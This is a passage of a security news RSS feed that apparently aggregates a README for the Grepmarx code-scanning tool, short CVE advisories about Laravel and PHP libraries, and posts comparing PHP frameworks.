workbench designed to efficiently browse scan results</li>  <li>Scan code that doesn't compile</li>  <li>Comprehensive LOC (Lines of Code) counter</li>  <li>Inspector: <a href="https://www.kitploit.com/search/label/Automatic" target="_blank" title="automatic">automatic</a> application features discovery</li>  <li>... and a Dark Mode</li>  </ul><span><a name="more"></a></span><div><br></div>  <h2 dir="auto" tabindex="-1">Screenshots</h2>  <table><tbody><tr><th>Scan customization</th>  <th>Analysis workbench</th>  <th>Rule pack edition</th>  </tr><tr><td><a href="https://github.com/Orange-Cyberdefense/grepmarx/blob/main/media/screen-1.png" rel="nofollow" target="_blank" title="A source code static analysis platform for AppSec enthusiasts. (6)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEiCky5KlD9Pw_lcLfNJjso58RH_EhVx6tYsjkw8cEgCgqFvlfM6sSkraQkGnkeqEs93Z08I7AmKygZGR9HRsVEKchLP0mTmV9Vr41EXqVnSDXaJWOpxAbLMyxaR4zS7gfuOZQYE6HZHicppNQ54TUWWT3TaHw4hEamHP6JRyHhHOj5_hrt2FaKd28oBtA"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/a/AVvXsEiCky5KlD9Pw_lcLfNJjso58RH_EhVx6tYsjkw8cEgCgqFvlfM6sSkraQkGnkeqEs93Z08I7AmKygZGR9HRsVEKchLP0mTmV9Vr41EXqVnSDXaJWOpxAbLMyxaR4zS7gfuOZQYE6HZHicppNQ54TUWWT3TaHw4hEamHP6JRyHhHOj5_hrt2FaKd28oBtA=s320"></a></td>  <td><a href="https://github.com/Orange-Cyberdefense/grepmarx/blob/main/media/screen-2.png" rel="nofollow" target="_blank" title="A source code static analysis platform for AppSec enthusiasts. (7)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEh_H5da-ITZtaagnLq9Ju0InFj99qJedGExyKHD7tEiqhICHOhG87o5Nb1dAD-397T2lUxXjJy9O4cIlS5jX5MXzfTiPszzNMNOc2j55jYzCeIZvRBeDnNP8MXN1PeYrItUJhhxKk46nF_tZl49ktM6qWH0r5wfYHgs4BDFY_lvMeK9dqXyWgCydqEuCg"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/a/AVvXsEh_H5da-ITZtaagnLq9Ju0InFj99qJedGExyKHD7tEiqhICHOhG87o5Nb1dAD-397T2lUxXjJy9O4cIlS5jX5MXzfTiPszzNMNOc2j55jYzCeIZvRBeDnNP8MXN1PeYrItUJhhxKk46nF_tZl49ktM6qWH0r5wfYHgs4BDFY_lvMeK9dqXyWgCydqEuCg=s320"></a></td>  <td><a href="https://github.com/Orange-Cyberdefense/grepmarx/blob/main/media/screen-3.png" rel="nofollow" target="_blank" title="A source code static analysis platform for AppSec enthusiasts. (8)"></a><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhiQe-xVluUPVmSZ1V-xjjlBJ1ai5qRAwilt6WKty0gzBplYrVRsB0gpYQLaDeTC4hbe39kU3dZuprymg5b3MLR5rE2SyTRs0D37Ox8vikKo53HSoWOc61v9mR9z4U7nvsqWgvJZtrKR9DUg3bHsYG3qdnpX7J74vk2my-JcGD0vCVd0sDePwIZRER35Q"><img alt="" border="0" src="https://blogger.googleusercontent.com/img/a/AVvXsEhiQe-xVluUPVmSZ1V-xjjlBJ1ai5qRAwilt6WKty0gzBplYrVRsB0gpYQLaDeTC4hbe39kU3dZuprymg5b3MLR5rE2SyTRs0D37Ox8vikKo53HSoWOc61v9mR9z4U7nvsqWgvJZtrKR9DUg3bHsYG3qdnpX7J74vk2my-JcGD0vCVd0sDePwIZRER35Q=s320"></a></td>  </tr></tbody></table><h2 dir="auto" tabindex="-1">Execution</h2>  <p dir="auto">Grepmarx is provided with a configuration to be executed in <a href="https://www.docker.com/" rel="nofollow" target="_blank" title="Docker">Docker</a> and <a href="https://gunicorn.org/" rel="nofollow" target="_blank" title="Gunicorn">Gunicorn</a>.</p>  <h4 dir="auto" tabindex="-1"><a href="https://www.docker.com/" rel="nofollow" target="_blank" title="Docker">Docker</a> execution</h4>  <hr><p dir="auto">Make sure you have docker-composer installed on the system, and the docker daemon is running.  The application can then be easily executed in a docker container. The steps:</p>  <blockquote>  <p dir="auto">Get the code</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git  $ cd grepmarx" dir="auto"><pre><code>$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git<br>$ cd grepmarx</code></pre></div>  <blockquote>  <p dir="auto">Start the app in Docker</p>  </blockquote>  <div><pre><code>$ sudo docker-compose pull &amp;&amp; sudo docker-compose build &amp;&amp; sudo docker-compose up -d</code></pre></div>  <p dir="auto">Visit <code>http://localhost:5000</code> in your browser. The app should be up &amp; running.</p>  <p dir="auto"><strong>Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.</strong></p>  <h4 dir="auto" tabindex="-1"><a href="https://gunicorn.org/" rel="nofollow" target="_blank" title="Gunicorn">Gunicorn</a></h4>  <hr><p dir="auto">Gunicorn 'Green Unicorn' is a Python WSGI HTTP Server for UNIX. A supervisor configuration file is provided to start it along with the required Celery worker (used for security scans queuing).</p>  <blockquote>  <p dir="auto">Install using pip</p>  </blockquote>  <div><pre><code>$ pip install gunicorn supervisor</code></pre></div>  <blockquote>  <p dir="auto">Start the app using gunicorn binary</p>  </blockquote>  <div><pre><code>$ supervisord -c supervisord.conf</code></pre></div>  <p dir="auto">Visit <code>http://localhost:8001</code> in your browser. The app should be up &amp; running.</p>  <p dir="auto"><strong>Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.</strong></p>  <h2 dir="auto" tabindex="-1">Build from sources</h2>  <blockquote>  <p dir="auto">Get the code</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git  $ cd grepmarx" dir="auto"><pre><code>$ git clone https://github.com/Orange-Cyberdefense/grepmarx.git<br>$ cd grepmarx</code></pre></div>  <blockquote>  <p dir="auto">Install virtualenv modules</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ virtualenv env  $ source env/bin/activate" dir="auto"><pre><code>$ virtualenv env<br>$ source env/bin/activate</code></pre></div>  <blockquote>  <p dir="auto">Install Python modules</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ # SQLite Database (Development)  $ pip3 install -r requirements.txt  $ # OR with &lt;a title=" href="https://www.kitploit.com/search/label/PostgreSQL" postgresql="">PostgreSQL connector (Production)  $ # pip install -r requirements-pgsql.txt" dir="auto"&gt;<pre><code>$ # SQLite Database (Development)<br>$ pip3 install -r requirements.txt<br>$ # OR with PostgreSQL connector (Production)<br>$ # pip install -r requirements-pgsql.txt</code></pre></div>  <blockquote>  <p dir="auto">Install additionnal requirements</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# Dependency scan (cdxgen / depscan) requirements  $ sudo apt install npm openjdk-17-jdk maven gradle golang composer  $ sudo npm install -g @cyclonedx/cdxgen  $ pip install appthreat-depscan" dir="auto"><pre><code># Dependency scan (cdxgen / depscan) requirements<br>$ sudo apt install npm openjdk-17-jdk maven gradle golang composer<br>$ sudo npm install -g @cyclonedx/cdxgen<br>$ pip install appthreat-depscan</code></pre></div>  <blockquote>  <p dir="auto">A Redis server is required to queue security scans. Install the <code>redis</code> package with your favorite distro package manager, then:</p>  </blockquote>  <div><pre><code>$ redis-server</code></pre></div>  <blockquote>  <p dir="auto">Set the FLASK_APP environment variable</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ export FLASK_APP=run.py  $ # Set up the DEBUG environment  $ # export FLASK_ENV=development" dir="auto"><pre><code>$ export FLASK_APP=run.py<br>$ # Set up the DEBUG environment<br>$ # export FLASK_ENV=development</code></pre></div>  <blockquote>  <p dir="auto">Start the celery worker process</p>  </blockquote>  <div><pre><code>$ celery -A app.celery_worker.celery worker --pool=prefork --loglevel=info --detach</code></pre></div>  <blockquote>  <p dir="auto">Start the application (development mode)</p>  </blockquote>  <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)  $ # --port=5000    - specify the app port (default 5000)    $ flask run --host=0.0.0.0 --port=5000" dir="auto"><pre><code>$ # --host=0.0.0.0 - expose the app on all network interfaces (default 127.0.0.1)<br>$ # --port=5000    - specify the app port (default 5000)  <br>$ flask run --host=0.0.0.0 --port=5000</code></pre></div>  <blockquote>  <p dir="auto">Access grepmarx in browser: <a href="http://127.0.0.1:5000/" rel="nofollow" target="_blank" title="http://127.0.0.1:5000/">http://127.0.0.1:5000/</a></p>  </blockquote>  <p dir="auto"><strong>Note: a default user account is created on first launch (user=admin / password=admin). Change the default password immediately.</strong></p>  <h2 dir="auto" tabindex="-1">Credits &amp; Links</h2>  <ul dir="auto"><li>The web application dashboard is based on <a href="https://github.com/app-generator/flask-dashboard-adminlte" rel="nofollow" target="_blank" title="AdminLTE Flask">AdminLTE Flask</a></li>  <li>SAST code scanning is powered by the <a href="https://semgrep.dev/" rel="nofollow" target="_blank" title="semgrep">semgrep</a> engine</li>  <li>SBOM generation is done with the great <a href="https://github.com/CycloneDX/cdxgen" rel="nofollow" target="_blank" title="CycloneDX cdxgen">CycloneDX cdxgen</a>, and SCA is performed using the awesome <a href="https://github.com/AppThreat/dep-scan" rel="nofollow" target="_blank" title="AppThreat dep-scan">AppThreat dep-scan</a></li>  <li>LOC counting is handled by <a href="https://github.com/boyter/scc" rel="nofollow" target="_blank" title="scc">scc</a></li>  <li>Features discovery is done using A<a href="https://github.com/microsoft/ApplicationInspector" rel="nofollow" target="_blank" title="pplication Inspector">pplication Inspector</a></li>  </ul><br><hr><p dir="auto">Grepmarx - Provided by <strong><a href="https://orangecyberdefense.com/" rel="nofollow" target="_blank" title="Orange Cyberdefense">Orange Cyberdefense</a></strong>.</p>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/Orange-Cyberdefense/grepmarx" rel="nofollow" target="_blank" title="Download Grepmarx">Download Grepmarx</a></span></b></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-28115]]></title>
<description><![CDATA[Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of ...]]></description>
<link>https://tsecurity.de/de/1826680/sicherheitsluecken/cve-2023-28115/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1826680/sicherheitsluecken/cve-2023-28115/</guid>
<pubDate>Sat, 18 Mar 2023 04:07:30 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2. (CVSS:0.0) (Last Update:2023-03-17)]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-28115]]></title>
<description><![CDATA[Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of ...]]></description>
<link>https://tsecurity.de/de/1826661/sicherheitsluecken/cve-2023-28115/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1826661/sicherheitsluecken/cve-2023-28115/</guid>
<pubDate>Sat, 18 Mar 2023 01:52:46 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Snappy is a PHP library allowing thumbnail, snapshot or PDF generation from a url or a html page. Prior to version 1.4.2, Snappy is vulnerable to PHAR deserialization due to a lack of checking on the protocol before passing it into the `file_exists()` function. If an attacker can upload files of any type to the server he can pass in the phar:// protocol to unserialize the uploaded file and instantiate arbitrary PHP objects. This can lead to remote code execution especially when snappy is used with frameworks with documented POP chains like Laravel/Symfony vulnerable developer code. If a user can control the output file from the `generateFromHtml()` function, it will invoke deserialization. This vulnerability is capable of remote code execution if Snappy is used with frameworks or developer code with vulnerable POP chains. It has been fixed in version 1.4.2.]]></content:encoded>
</item>
<item>
<title><![CDATA[CodeLobster IDE 2.3.0 - Integrated development environment for PHP, HTML, CSS, JavaScript files.]]></title>
<description><![CDATA[CodeLobster IDE is a smart free cross-platform IDE primarily intended for creating and editing PHP, HTML, CSS, JavaScript files with support Drupal CMS, Joomla CMS, Magento CMS, Smarty template engine, Twig template engine, JQuery library, AngularJS, BackboneJS, Laravel, MeteorJS, Phalcon, CodeIg...]]></description>
<link>https://tsecurity.de/de/1798448/ios-mac-os/codelobster-ide-230-integrated-development-environment-for-php-html-css-javascript-files/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1798448/ios-mac-os/codelobster-ide-230-integrated-development-environment-for-php-html-css-javascript-files/</guid>
<pubDate>Wed, 15 Feb 2023 14:16:48 +0100</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong>CodeLobster IDE</strong> is a smart free cross-platform IDE primarily intended for creating and editing PHP, HTML, CSS, JavaScript files with support Drupal CMS, Joomla CMS, Magento CMS, Smarty template engine, Twig template engine, JQuery library, AngularJS, BackboneJS, Laravel, MeteorJS, Phalcon, CodeIgniter, CakePHP, Symfony, VueJS, Yii and WordPress. It includes full-features PHP debugger, dynamic help, advanced autocomplete and FTP/SFTP client.
<br>CodeLobster IDE streamlines and simplifies the PHP development process. You don't need to keep in mind the names of functions, arguments, tags or their attributes -- we've implemented all these for you with autocomplete features for PHP, HTML, JavaScript and even CSS. And you can always get necessary help information by pressing F1 or using the special Help control. 
An internal free PHP Debugger allows you to validate your code locally. It automatically detects your current server settings and configures corresponding files in order to let you use the debugger. </p><br><br><ul><li>New features: Parsing JavaScript inside function parameters</li>
<li>Bugs fixed: Free version crashes on code validation</li>
</ul><br><br><a href="https://www.macupdate.com/app/mac/60778/codelobster-ide">Download Now</a><img src="https://desktop.macupdate.com/api/620/discover/ttra" height="1" width="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-4262 | laravel-jqgrid EloquentRepositoryAbstract.php getRows sql injection (ID 72)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in laravel-jqgrid. Affected by this vulnerability is the function getRows of the file src/Mgallegos/LaravelJqgrid/Repositories/EloquentRepositoryAbstract.php. The manipulation leads to sql injection.

This vulnerability is known as CVE-2021-4262. A...]]></description>
<link>https://tsecurity.de/de/1770311/sicherheitsluecken/cve-2021-4262-laravel-jqgrid-eloquentrepositoryabstractphp-getrows-sql-injection-id-72/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1770311/sicherheitsluecken/cve-2021-4262-laravel-jqgrid-eloquentrepositoryabstractphp-getrows-sql-injection-id-72/</guid>
<pubDate>Sun, 15 Jan 2023 18:47:27 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> was found in <a href="https://vuldb.com/?product.laravel-jqgrid">laravel-jqgrid</a>. Affected by this vulnerability is the function <code>getRows</code> of the file <em>src/Mgallegos/LaravelJqgrid/Repositories/EloquentRepositoryAbstract.php</em>. The manipulation leads to sql injection.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.216271">CVE-2021-4262</a>. Access to the local network is required for this attack to succeed. There is no exploit available.

It is recommended to apply a patch to fix this issue.]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel 9.47.0 Information Disclosure]]></title>
<description><![CDATA[Laravel versions 1.0 to 9.47.0 suffer from database disclosure and information leakage vulnerabilities.]]></description>
<link>https://tsecurity.de/de/1768607/it-security-tools/laravel-9470-information-disclosure/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1768607/it-security-tools/laravel-9470-information-disclosure/</guid>
<pubDate>Fri, 13 Jan 2023 17:01:01 +0100</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Laravel versions 1.0 to 9.47.0 suffer from database disclosure and information leakage vulnerabilities.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2017-16894 | Laravel Framework up to 5.5.21 Permission /.env writeNewEnvironmentFileWith Password information disclosure (ID 153641)]]></title>
<description><![CDATA[A vulnerability was found in Laravel Framework up to 5.5.21. It has been classified as problematic. This affects the function writeNewEnvironmentFileWith of the file /.env of the component Permission. The manipulation as part of Password leads to information disclosure  (Password).

This vulnerab...]]></description>
<link>https://tsecurity.de/de/1764450/sicherheitsluecken/cve-2017-16894-laravel-framework-up-to-5521-permission-env-writenewenvironmentfilewith-password-information-disclosure-id-153641/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1764450/sicherheitsluecken/cve-2017-16894-laravel-framework-up-to-5521-permission-env-writenewenvironmentfilewith-password-information-disclosure-id-153641/</guid>
<pubDate>Wed, 11 Jan 2023 08:02:27 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.laravel:framework">Laravel Framework up to 5.5.21</a>. It has been classified as <a href="https://vuldb.com/?kb.risk">problematic</a>. This affects the function <code>writeNewEnvironmentFileWith</code> of the file <em>/.env</em> of the component <em>Permission</em>. The manipulation as part of <em>Password</em> leads to information disclosure  (Password).

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.109743">CVE-2017-16894</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2021-4262]]></title>
<description><![CDATA[A vulnerability classified as critical was found in laravel-jqgrid. Affected by this vulnerability is the function getRows of the file src/Mgallegos/LaravelJqgrid/Repositories/EloquentRepositoryAbstract.php. The manipulation leads to sql injection. The name of the patch is fbc2d94f43d0dc772767a5b...]]></description>
<link>https://tsecurity.de/de/1739041/sicherheitsluecken/cve-2021-4262/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1739041/sicherheitsluecken/cve-2021-4262/</guid>
<pubDate>Mon, 19 Dec 2022 16:17:42 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as critical was found in laravel-jqgrid. Affected by this vulnerability is the function getRows of the file src/Mgallegos/LaravelJqgrid/Repositories/EloquentRepositoryAbstract.php. The manipulation leads to sql injection. The name of the patch is fbc2d94f43d0dc772767a5bdb2681133036f935e. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216271.]]></content:encoded>
</item>
<item>
<title><![CDATA[Users]]></title>
<description><![CDATA[Bei Laravel und Symfony handelt es sich um die beliebtesten PHP-Frameworks. Mit beiden lassen sich anspruchsvolle Webanwendungen erstellen. Dabei gilt Laravel als einfacher und Symfony als mächtiger. Wir zeigen im Vergleich Symfony vs. Laravel die Stärken und Schwächen der beiden Frameworks und g...]]></description>
<link>https://tsecurity.de/de/1724777/server/users/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1724777/server/users/</guid>
<pubDate>Thu, 08 Dec 2022 11:02:46 +0100</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://www.ionos.de/digitalguide/fileadmin/DigitalGuide/Teaser/yaml-framework-t.jpg"><br>
    Bei Laravel und Symfony handelt es sich um die beliebtesten PHP-Frameworks. Mit beiden lassen sich anspruchsvolle Webanwendungen erstellen. Dabei gilt Laravel als einfacher und Symfony als mächtiger. Wir zeigen im Vergleich Symfony vs. Laravel die Stärken und Schwächen der beiden Frameworks und gehen auf die wichtigsten Unterschiede ein.]]></content:encoded>
</item>
<item>
<title><![CDATA[Zend vs Laravel: Which One You Should Opt For?]]></title>
<description><![CDATA[Laravel and Zend are two of the most popular PHP frameworks, used by countless developers working on web applications. But choosing between them can be difficult — so we’ve created the following expert guide to help make it easier. Below, we will explore Laravel and Zend in detail, compare them b...]]></description>
<link>https://tsecurity.de/de/1707208/server/zend-vs-laravel-which-one-you-should-opt-for/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1707208/server/zend-vs-laravel-which-one-you-should-opt-for/</guid>
<pubDate>Fri, 25 Nov 2022 15:49:24 +0100</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Laravel and Zend are two of the most popular PHP frameworks, used by countless developers working on web applications. But choosing between them can be difficult — so we’ve created the following expert guide to help make it easier. Below, we will explore Laravel and Zend in detail, compare them based on various key factors, and provide you with the information you need to make a decision. Zend vs Laravel: What are the Advantages and Disadvantages? Developers can use PHP, a server-side scripting language, to create web applications that are either static or dynamic. Fortunately, PHP is fairly simple to…</p>
<p>The post <a rel="nofollow" href="https://www.plesk.com/blog/various/laravel-vs-zend/" data-wpel-link="internal">Zend vs Laravel: Which One You Should Opt For?</a> appeared first on <a rel="nofollow" href="https://www.plesk.com/" data-wpel-link="internal">Plesk</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Laravel vs Symfony: How Do They Compare?]]></title>
<description><![CDATA[In the United States, PHP adoption continues to spread among businesses on different scales: at the time of writing, this language is used to power more than 14 million websites and counting. Before they start working on a PHP web app, it’s common for developers to wonder which framework will hel...]]></description>
<link>https://tsecurity.de/de/1707117/server/laravel-vs-symfony-how-do-they-compare/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1707117/server/laravel-vs-symfony-how-do-they-compare/</guid>
<pubDate>Fri, 25 Nov 2022 14:34:30 +0100</pubDate>
<category>🐧 Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>In the United States, PHP adoption continues to spread among businesses on different scales: at the time of writing, this language is used to power more than 14 million websites and counting. Before they start working on a PHP web app, it’s common for developers to wonder which framework will help them achieve the best results. Choosing from the various options on the market can seem daunting, which is why we have written the following guide comparing two of the top options — Laravel and Symfony. These frameworks stand out from the rest, and with good reason. Find out how…</p>
<p>The post <a rel="nofollow" href="https://www.plesk.com/blog/various/laravel-vs-symfony-how-do-they-compare/" data-wpel-link="internal">Laravel vs Symfony: How Do They Compare?</a> appeared first on <a rel="nofollow" href="https://www.plesk.com/" data-wpel-link="internal">Plesk</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Modern PHP features explained - PHP 8.0 and 8.1 (Laravel News)]]></title>
<description><![CDATA[This
Laravel News article digs into the many enhancements that have found
their way into the PHP language in the last couple of years or so.


	Lovely Enums, the savior of pointless database tables and floating
	constants across the codebases of the world. Enums have quickly
	become one of my fav...]]></description>
<link>https://tsecurity.de/de/1677449/linux-tipps/modern-php-features-explained-php-80-and-81-laravel-news/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1677449/linux-tipps/modern-php-features-explained-php-80-and-81-laravel-news/</guid>
<pubDate>Thu, 27 Oct 2022 18:15:15 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<a href="https://laravel-news.com/modern-php-features-explained">This
Laravel News article</a> digs into the many enhancements that have found
their way into the PHP language in the last couple of years or so.
<p>
</p><blockquote class="bq">
	Lovely Enums, the savior of pointless database tables and floating
	constants across the codebases of the world. Enums have quickly
	become one of my favorite features of PHP 8.1 - I can now push my
	roles into Enums instead of keeping them in a table that never
	changes.
</blockquote>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-39357]]></title>
<description><![CDATA[Winter is a free, open-source content management system based on the Laravel PHP framework. The Snowboard framework in versions 1.1.8, 1.1.9, and 1.2.0 is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. The 1.0 branch of Winter is not affected, as it do...]]></description>
<link>https://tsecurity.de/de/1676415/sicherheitsluecken/cve-2022-39357/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1676415/sicherheitsluecken/cve-2022-39357/</guid>
<pubDate>Wed, 26 Oct 2022 18:34:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Winter is a free, open-source content management system based on the Laravel PHP framework. The Snowboard framework in versions 1.1.8, 1.1.9, and 1.2.0 is vulnerable to prototype pollution in the main Snowboard class as well as its plugin loader. The 1.0 branch of Winter is not affected, as it does not contain the Snowboard framework. This issue has been patched in v1.1.10 and v1.2.1. As a workaround, one may avoid this issue by following some common security practices for JavaScript, including implementing a content security policy and auditing scripts.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-40734 | UniSharp laravel-filemanager up to 2.5.1 download working_dir pathname traversal (ID 1150)]]></title>
<description><![CDATA[A vulnerability was found in  UniSharp laravel-filemanager up to 2.5.1. It has been classified as problematic. This affects an unknown part of the file download. The manipulation of the argument working_dir leads to pathname traversal.

This vulnerability is uniquely identified as CVE-2022-40734....]]></description>
<link>https://tsecurity.de/de/1665303/sicherheitsluecken/cve-2022-40734-unisharp-laravel-filemanager-up-to-251-download-workingdir-pathname-traversal-id-1150/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1665303/sicherheitsluecken/cve-2022-40734-unisharp-laravel-filemanager-up-to-251-download-workingdir-pathname-traversal-id-1150/</guid>
<pubDate>Mon, 17 Oct 2022 16:05:11 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in  UniSharp laravel-filemanager up to 2.5.1. It has been classified as problematic. This affects an unknown part of the file <em>download</em>. The manipulation of the argument <em>working_dir</em> leads to pathname traversal.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.208617">CVE-2022-40734</a>. The attack needs to be done within the local network. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-35944]]></title>
<description><![CDATA[October is a self-hosted Content Management System (CMS) platform based on the Laravel PHP Framework. This vulnerability only affects installations that rely on the safe mode restriction, commonly used when providing public access to the admin panel. Assuming an attacker has access to the admin p...]]></description>
<link>https://tsecurity.de/de/1661965/sicherheitsluecken/cve-2022-35944/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1661965/sicherheitsluecken/cve-2022-35944/</guid>
<pubDate>Fri, 14 Oct 2022 02:18:08 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[October is a self-hosted Content Management System (CMS) platform based on the Laravel PHP Framework. This vulnerability only affects installations that rely on the safe mode restriction, commonly used when providing public access to the admin panel. Assuming an attacker has access to the admin panel and permission to open the "Editor" section, they can bypass the Safe Mode (`cms.safe_mode`) restriction to introduce new PHP code in a CMS template using a specially crafted request. The issue has been patched in versions 2.2.34 and 3.0.66.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38089 | exceedone Exment/laravel-admin cross site scripting]]></title>
<description><![CDATA[A vulnerability has been found in  exceedone Exment and laravel-admin and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting.

This vulnerability is known as CVE-2022-38089. The attack can be launched remotely. The...]]></description>
<link>https://tsecurity.de/de/1641853/sicherheitsluecken/cve-2022-38089-exceedone-exmentlaravel-admin-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1641853/sicherheitsluecken/cve-2022-38089-exceedone-exmentlaravel-admin-cross-site-scripting/</guid>
<pubDate>Sun, 25 Sep 2022 11:17:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in  exceedone Exment and laravel-admin and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.207085">CVE-2022-38089</a>. The attack can be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2022-38080 | exceedone Exment/laravel-admin cross site scripting]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in  exceedone Exment and laravel-admin. Affected is an unknown function. The manipulation leads to cross site scripting.

This vulnerability is traded as CVE-2022-38080. It is possible to launch the attack remotely. There is no explo...]]></description>
<link>https://tsecurity.de/de/1641854/sicherheitsluecken/cve-2022-38080-exceedone-exmentlaravel-admin-cross-site-scripting/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1641854/sicherheitsluecken/cve-2022-38080-exceedone-exmentlaravel-admin-cross-site-scripting/</guid>
<pubDate>Sun, 25 Sep 2022 11:17:26 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as problematic, was found in  exceedone Exment and laravel-admin. Affected is an unknown function. The manipulation leads to cross site scripting.

